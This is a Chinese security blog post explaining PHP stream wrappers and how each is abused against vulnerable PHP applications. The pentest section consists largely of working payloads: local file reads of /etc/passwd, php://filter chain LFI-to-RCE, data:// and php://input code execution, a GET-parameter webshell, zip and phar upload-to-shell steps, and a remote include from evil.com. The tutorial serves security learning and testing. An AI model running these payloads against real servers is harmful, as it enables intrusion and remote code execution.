<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
<meta name="baidu-site-verification" content="codeva-l4PbCwKc7Z">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="google-site-verification" content="FEUc84rh7dgaXl_JOY_Bq7sulvZljH">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Monaco:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.thiiiiink.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"default"},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":true,"lazyload":true,"pangu":true,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":null,"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="什么是php wrapper?PHP wrapper基于流（stream）的概念，流是数据传输的抽象表示。wrapper定义了如何处理特定协议或资源（如文件、HTTP请求、内存流）的输入输出操作。每个wrapper通过PHP的流函数（如 fopen()、file_get_contents）与底层资源交互，提供统一的借口来操作不同类型的数据源。wrapper除了内置于PHP之外，也可以通过 stre">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP Wrapper 利用">
<meta property="og:url" content="https://www.thiiiiink.com/post/20250311021811.html">
<meta property="og:site_name" content="临渊羡鱼">
<meta property="og:description" content="什么是php wrapper?PHP wrapper基于流（stream）的概念，流是数据传输的抽象表示。wrapper定义了如何处理特定协议或资源（如文件、HTTP请求、内存流）的输入输出操作。每个wrapper通过PHP的流函数（如 fopen()、file_get_contents）与底层资源交互，提供统一的借口来操作不同类型的数据源。wrapper除了内置于PHP之外，也可以通过 stre">
<meta property="og:locale">
<meta property="article:published_time" content="2025-03-10T18:18:11.000Z">
<meta property="article:modified_time" content="2025-09-30T07:30:07.056Z">
<meta property="article:author" content="Yiaos">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://www.thiiiiink.com/post/20250311021811.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>PHP Wrapper 利用 | 临渊羡鱼</title>
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-J67WGCEZY5"></script>
    <script>
      if (CONFIG.hostname === location.hostname) {
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'G-J67WGCEZY5');
      }
    </script>


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?257c5564d6a2b53ffc355cd89f5f2095";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta custom-logo">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">临渊羡鱼</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">退而结网</p>
      <a>
        <img class="custom-logo-image" src="/images/avatar.gif" alt="临渊羡鱼">
      </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" placeholder="Searching..." spellcheck="false" type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="https://www.thiiiiink.com/post/20250311021811.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Yiaos">
      <meta itemprop="description" content>
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="临渊羡鱼">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          PHP Wrapper 利用
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2025-03-11 02:18:11" itemprop="dateCreated datePublished" datetime="2025-03-11T02:18:11+08:00">2025-03-11</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2025-09-30 15:30:07" itemprop="dateModified" datetime="2025-09-30T15:30:07+08:00">2025-09-30</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/How-It-Works-%E4%B8%B4%E6%B8%8A%E7%BE%A1%E9%B1%BC/" itemprop="url" rel="index"><span itemprop="name">How It Works-临渊羡鱼</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/How-It-Works-%E4%B8%B4%E6%B8%8A%E7%BE%A1%E9%B1%BC/PHP/" itemprop="url" rel="index"><span itemprop="name">PHP</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="什么是php-wrapper"><a href="#什么是php-wrapper" class="headerlink" title="什么是php wrapper?"></a>什么是php wrapper?</h1><p>PHP wrapper基于流（stream）的概念，流是数据传输的抽象表示。wrapper定义了如何处理特定协议或资源（如文件、HTTP请求、内存流）的输入输出操作。每个wrapper通过PHP的流函数（如 <code>fopen()</code>、<code>file_get_contents</code>）与底层资源交互，提供统一的借口来操作不同类型的数据源。wrapper除了内置于PHP之外，也可以通过 <code>stream_wrapper_register()</code>自定义。</p>
<p>如以下php代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$handle</span> = <span class="title function_ invoke__">fopen</span>(<span class="string">&quot;file://some.txt&quot;</span>,<span class="string">&quot;rb&quot;</span>);</span><br><span class="line"><span class="keyword">while</span>(<span class="title function_ invoke__">feof</span>(<span class="variable">$handle</span>)!==<span class="literal">true</span>) &#123;</span><br><span class="line"><span class="title function_ invoke__">echofgets</span>(<span class="variable">$handle</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<span id="more"></span>

<p>等同于</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">file</span>(<span class="string">&quot;file://some.txt&quot;</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h2 id="PHP内置Wrapper列表"><a href="#PHP内置Wrapper列表" class="headerlink" title="PHP内置Wrapper列表"></a>PHP内置Wrapper列表</h2><table>
<thead>
<tr>
<th>包装器名称</th>
<th>原理</th>
<th>用途</th>
</tr>
</thead>
<tbody><tr>
<td>file:&#x2F;&#x2F;</td>
<td>默认的文件系统包装器，允许访问本地文件系统中的文件和目录。</td>
<td>用于读取或写入本地文件，如配置文件、日志文件等。</td>
</tr>
<tr>
<td>http:&#x2F;&#x2F;</td>
<td>通过HTTP协议访问远程服务器上的资源，使用GET方法获取数据。</td>
<td>用于从Web服务器获取文件或数据（如API调用），常用于抓取网页内容。</td>
</tr>
<tr>
<td>https:&#x2F;&#x2F;</td>
<td>与http:&#x2F;&#x2F;类似，但通过SSL&#x2F;TLS加密传输数据。</td>
<td>用于安全地访问远程Web资源，常用于处理需要加密的HTTP请求。</td>
</tr>
<tr>
<td>ftp:&#x2F;&#x2F;</td>
<td>通过FTP协议访问远程FTP服务器上的文件，支持身份验证。</td>
<td>用于从FTP服务器下载或上传文件，常用于文件传输任务。</td>
</tr>
<tr>
<td>ftps:&#x2F;&#x2F;</td>
<td>FTP的加密版本，使用SSL&#x2F;TLS保护数据传输。</td>
<td>用于安全地传输文件到FTP服务器，适用于需要加密的场景。</td>
</tr>
<tr>
<td>php:&#x2F;&#x2F;</td>
<td>特殊的I&#x2F;O流包装器，用于访问PHP进程的输入输出流或临时内存。</td>
<td>提供对标准输入输出、请求体、内存流的访问，常用于处理自定义输入输出或调试。</td>
</tr>
<tr>
<td>data:&#x2F;&#x2F;</td>
<td>允许直接嵌入数据到URI中，通常以Base64编码形式存储。</td>
<td>用于将小型数据（如图片或脚本）嵌入代码中，避免外部文件依赖，常用于测试或简单数据传递。</td>
</tr>
<tr>
<td>zip:&#x2F;&#x2F;</td>
<td>访问ZIP压缩文件内的内容，需提供ZIP文件路径和内部文件路径。</td>
<td>用于读取或操作ZIP文件中的内容，如解压特定文件，常用于处理压缩包。</td>
</tr>
<tr>
<td>phar:&#x2F;&#x2F;</td>
<td>访问PHP归档文件（Phar）中的内容，类似于ZIP但专为PHP设计。</td>
<td>用于运行或访问Phar打包的PHP应用，常用于分发PHP库或应用程序。</td>
</tr>
<tr>
<td>glob:&#x2F;&#x2F;</td>
<td>使用通配符模式匹配文件系统中的文件或目录。</td>
<td>用于批量处理文件，如查找所有.txt文件，常用于文件管理任务。</td>
</tr>
<tr>
<td>compress.zlib:&#x2F;&#x2F;</td>
<td>处理使用zlib（gzip）压缩的文件或流，支持读写操作。</td>
<td>用于解压或压缩文件，常用于处理.gz文件或节省存储空间。</td>
</tr>
<tr>
<td>compress.bzip2:&#x2F;&#x2F;</td>
<td>处理使用bzip2压缩的文件或流，支持读写操作。</td>
<td>用于解压或压缩文件，常用于处理.bz2文件，提供更高的压缩率。</td>
</tr>
<tr>
<td>ssh2:&#x2F;&#x2F;</td>
<td>通过SSH2协议访问远程服务器的文件系统或执行命令（需SSH2扩展）。</td>
<td>用于通过SSH安全地操作远程文件或执行命令，常用于服务器管理。</td>
</tr>
<tr>
<td>ogg:&#x2F;&#x2F;</td>
<td>处理Ogg Vorbis音频流（需oggvorbis扩展）。</td>
<td>用于读取或处理Ogg格式音频文件，常用于音频应用开发。</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
</tbody></table>
<h2 id="php-子包装器详解"><a href="#php-子包装器详解" class="headerlink" title="php:&#x2F;&#x2F; 子包装器详解"></a>php:&#x2F;&#x2F; 子包装器详解</h2><p>php:&#x2F;&#x2F;包装器功能丰富且用途广泛，其子类型如下：</p>
<table>
<thead>
<tr>
<th>子包装器</th>
<th>原理</th>
<th>用途</th>
</tr>
</thead>
<tbody><tr>
<td>php:&#x2F;&#x2F;stdin</td>
<td>提供对标准输入流的只读访问，等同于常量STDIN。</td>
<td>用于从命令行读取用户输入，适用于CLI脚本。</td>
</tr>
<tr>
<td>php:&#x2F;&#x2F;stdout</td>
<td>提供对标准输出流的可写访问，等同于常量STDOUT。</td>
<td>用于向命令行输出数据，适用于CLI脚本。</td>
</tr>
<tr>
<td>php:&#x2F;&#x2F;stderr</td>
<td>提供对标准错误流的可写访问，等同于常量STDERR。</td>
<td>用于输出错误信息到命令行，适用于CLI脚本中的错误处理。</td>
</tr>
<tr>
<td>php:&#x2F;&#x2F;input</td>
<td>提供对HTTP请求原始数据的只读访问，获取请求体内容。</td>
<td>用于读取POST、PUT等请求的原始数据，常用于RESTful API处理。</td>
</tr>
<tr>
<td>php:&#x2F;&#x2F;output</td>
<td>提供对输出缓冲区的可写访问，类似echo或print。</td>
<td>用于直接写入输出缓冲区，常用于动态生成内容。</td>
</tr>
<tr>
<td>php:&#x2F;&#x2F;memory</td>
<td>在内存中创建读写流，数据始终存储在内存中。</td>
<td>用于临时存储数据，适合小规模数据处理，关闭后数据丢失。</td>
</tr>
<tr>
<td>php:&#x2F;&#x2F;temp</td>
<td>在内存中创建读写流，超出指定大小（如2MB）后转为临时文件。</td>
<td>用于处理较大临时数据，内存不足时自动切换到文件存储。</td>
</tr>
<tr>
<td>php:&#x2F;&#x2F;filter</td>
<td>元包装器，允许在打开流时应用过滤器（如编码或转换）。</td>
<td>用于在读取或写入时处理数据，如将文件内容转为Base64编码，常用于调试或安全检查。</td>
</tr>
</tbody></table>
<h1 id="在渗透测试中的利用"><a href="#在渗透测试中的利用" class="headerlink" title="在渗透测试中的利用"></a>在渗透测试中的利用</h1><h2 id="file"><a href="#file" class="headerlink" title="file://"></a><code>file://</code></h2><p>如果应用程序 <strong>未对用户输入的文件路径进行过滤</strong> ，攻击者可以使用 <code>file://</code> 访问服务器上的任意可读文件。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;file:///etc/passwd&quot;</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;file://C:/Windows/system.ini&quot;</span>);</span><br></pre></td></tr></table></figure>

<h2 id="php-filter"><a href="#php-filter" class="headerlink" title="php://filter"></a><code>php://filter</code></h2><p>在 <code>file://</code> 不可用或被WAF过滤时可以利用编码方式读取敏感信息</p>
<ol>
<li>base64读取php源码</li>
</ol>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;php://filter/convert.base64-encode/resource=config.php&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;base64_encoded_string&quot;</span> | base64 -d</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>filter chain结合LFI实现RCE</li>
</ol>
<blockquote>
<p>github: <a target="_blank" rel="external nofollow noopener noreferrer" href="https://github.com/synacktiv/php_filter_chain_generator">https://github.com/synacktiv/php_filter_chain_generator</a></p>
</blockquote>
<p><code>php_filter_chain_generator.py</code> 利用PHP过滤器的可组合性，通过精心设计的过滤器组合，将攻击者提供的PHP代码（如 <code>&lt;?php system(&#39;id&#39;); ?&gt;</code>）转换为可在目标上下文中执行的形式，具体来说是利用不同编码和转码之间的差异，在php中这种差异导致的错误会被忽略，从而生成了不符预期的字符</p>
<p>我们可以在python源码中看到作者构建好的字母和数字的filter chain</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">conversions <span class="operator">=</span> &#123;</span><br><span class="line">    ...</span><br><span class="line">    <span class="string">&#x27;9&#x27;</span>: <span class="string">&#x27;convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;A&#x27;</span>: <span class="string">&#x27;convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;a&#x27;</span>: <span class="string">&#x27;convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;B&#x27;</span>: <span class="string">&#x27;convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;b&#x27;</span>: <span class="string">&#x27;convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE&#x27;</span>,</span><br><span class="line">    ....</span><br></pre></td></tr></table></figure>

<p>即便是没有可写入路径的情况下也可以通过 <code>php://temp</code>来利用。</p>
<blockquote>
<p>细节请阅读：<a target="_blank" rel="external nofollow noopener noreferrer" href="https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html">PHP filters chain: What is it and how to use it</a></p>
</blockquote>
<p>示例：利用filters chain向日志文件中注入恶意代码，然后利用LFI执行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">python3 php_filter_chain_generator.py --chain <span class="string">&#x27;&lt;?php system(&quot;id&quot;); ?&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line">[+] The following gadget chain will generate the following code : <span class="meta">&lt;?php</span> <span class="title function_ invoke__">system</span>(<span class="string">&quot;id&quot;</span>); <span class="meta">?&gt;</span> (base64 value: PD9waHAgc3lzdGVtKCJpZCIpOyA/Pg)</span><br><span class="line">php:<span class="comment">//filter/convert.iconv.UTF8.CSISO2022KR|c...de/resource=/var/log/apache2/access.log</span></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Testers should make sure to change the $URL, $FILTERS with the chaining that generates their payload and $FILE with the path to the file they can read.</span></span><br><span class="line">curl --user-agent <span class="string">&quot;PENTEST&quot;</span> <span class="string">&quot;<span class="variable">$URL</span>?parameter=php://filter/<span class="variable">$FILTERS</span>/resource=<span class="variable">$FILE</span>&quot;</span></span><br><span class="line"></span><br><span class="line">curl --user-agent <span class="string">&quot;PENTEST&quot;</span> <span class="string">&quot;<span class="variable">$URL</span>?parameter=php://convert.base64-decode|...|resource=/var/log/apache2/access.log&quot;</span></span><br></pre></td></tr></table></figure>

<h2 id="data"><a href="#data" class="headerlink" title="data://"></a><code>data://</code></h2><p>前提： <code>allow_url_include</code>: on</p>
<p><code>data://</code> 允许在 URL 直接嵌入 Base64 编码的数据，并作为输入流。<code>include()</code> 会将 Base64 解码，并执行 PHP 代码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Shell in base64 encoding</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;&lt;?php system(<span class="variable">$_GET</span>[&#x27;cmd&#x27;]); ?&gt;&quot;</span> | <span class="built_in">base64</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Accessing the log file via LFI</span></span><br><span class="line">curl --user-agent <span class="string">&quot;PENTEST&quot;</span> <span class="string">&quot;<span class="variable">$URL</span>/?parameter=data://text/plain;base64,<span class="variable">$SHELL_BASE64</span>&amp;cmd=id&quot;</span></span><br><span class="line"></span><br><span class="line">例：</span><br><span class="line">include(<span class="string">&quot;data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOz8+&quot;</span>);</span><br><span class="line">decode: &lt;?php system(<span class="string">&#x27;id&#x27;</span>); ?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="php-input"><a href="#php-input" class="headerlink" title="php://input"></a><code>php://input</code></h2><p>前提： <code>allow_url_include</code>: on</p>
<p><code>php://input</code> 允许读取 HTTP 请求的 <strong>原始输入数据</strong> 。会直接解析用户传入的代码并执行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Testers should make sure to change the $URL</span></span><br><span class="line">curl --user-agent <span class="string">&quot;PENTEST&quot;</span> -s -X POST --data <span class="string">&quot;&lt;?php system(&#x27;id&#x27;); ?&gt;&quot;</span> <span class="string">&quot;<span class="variable">$URL</span>?parameter=php://input&quot;</span></span><br><span class="line"></span><br><span class="line">curl -X POST --data <span class="string">&quot;&lt;?php system(&#x27;id&#x27;); ?&gt;&quot;</span> http://target.com/vuln.php</span><br></pre></td></tr></table></figure>

<h2 id="expect"><a href="#expect" class="headerlink" title="expect://"></a><code>expect://</code></h2><p>前提：expect extension</p>
<p>如果 <code>expect://</code> 被启用，可以直接执行命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">curl --user-agent <span class="string">&quot;PENTEST&quot;</span> -s <span class="string">&quot;<span class="variable">$URL</span>/?parameter=expect://id&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">echo</span> file_get_contents(<span class="string">&quot;expect://ls -la&quot;</span>);</span><br></pre></td></tr></table></figure>

<h2 id="zip"><a href="#zip" class="headerlink" title="zip://"></a><code>zip://</code></h2><p>前提：可以上传.zip文件</p>
<p><code>zip://</code>会读取和执行zip中的文件，可以绕过一些检查, 可通过 <code>include(&#39;zip://evil.zip#shell.php&#39;) </code>来执行恶意代码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;&lt;?php system(<span class="variable">$_GET</span>[&#x27;cmd&#x27;]); ?&gt;&quot;</span> &gt; payload.php</span><br><span class="line">zip payload.zip payload.php</span><br><span class="line"></span><br><span class="line"><span class="comment"># Accessing the log file via LFI (the # identifier is URL-encoded)</span></span><br><span class="line">curl --user-agent <span class="string">&quot;PENTEST&quot;</span> <span class="string">&quot;<span class="variable">$URL</span>/?parameter=zip://payload.zip%23payload.php&amp;cmd=id&quot;</span></span><br></pre></td></tr></table></figure>

<h2 id="phpar"><a href="#phpar" class="headerlink" title="phpar://"></a><code>phpar://</code></h2><p>前提：可以上传文件</p>
<p><code>phar://</code> 允许访问 <code>.phar</code> 归档文件中的数据， 原理基本同 <code>zip://</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$phar</span> = <span class="keyword">new</span> <span class="title class_">Phar</span>(<span class="string">&#x27;shell.phar&#x27;</span>);</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">startBuffering</span>();</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">addFromString</span>(<span class="string">&#x27;shell.txt&#x27;</span>, <span class="string">&#x27;&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;&#x27;</span>);</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">setStub</span>(<span class="string">&#x27;&lt;?php __HALT_COMPILER(); ?&gt;&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">stopBuffering</span>();</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">php --define phar.<span class="keyword">readonly</span>=<span class="number">0</span> shell.php &amp;&amp; mv shell.phar shell.jpg</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">curl --user-agent <span class="string">&quot;PENTEST&quot;</span> <span class="string">&quot;<span class="subst">$URL</span>/?parameter=phar://./shell.jpg%2Fshell.txt&amp;cmd=id&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="variable">$object</span> = <span class="title function_ invoke__">unserialize</span>(<span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;phar://evil.phar&quot;</span>));</span><br></pre></td></tr></table></figure>

<p>如果 <code>unserialize()</code> 解析 <code>phar://</code>，也可能触发 <code>__wakeup()</code> 或 <code>__destruct()</code> 执行任意代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$object</span> = <span class="title function_ invoke__">unserialize</span>(<span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;phar://evil.phar&quot;</span>));</span><br></pre></td></tr></table></figure>

<h2 id="compress-zlib"><a href="#compress-zlib" class="headerlink" title="compress.zlib://"></a><code>compress.zlib://</code></h2><p><code>compress.zlib://</code> 利用原理同上</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;compress.zlib://shell.php.gz&#x27;</span>)</span><br></pre></td></tr></table></figure>

<h2 id="compress-bzip2"><a href="#compress-bzip2" class="headerlink" title="compress.bzip2://"></a><code>compress.bzip2://</code></h2><p>原理同上</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;compress.bzip2://shell.php.bz2&#x27;</span>)</span><br></pre></td></tr></table></figure>

<h2 id="ftp-ftps"><a href="#ftp-ftps" class="headerlink" title="ftp:// &#x2F; ftps://"></a><code>ftp://</code> &#x2F; <code>ftps://</code></h2><p>前提：<code>allow_url_fopen=On</code></p>
<p><code>ftp://</code> 允许 PHP 访问 FTP 服务器上的文件，攻击者可以 <strong>远程包含恶意 PHP</strong> ，触发 RCE；也可以用于  <strong>SSRF（服务器端请求伪造）</strong> ，探测内网资产</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;ftp://user:pass@evil.com/malware.php&quot;</span>);</span><br></pre></td></tr></table></figure>

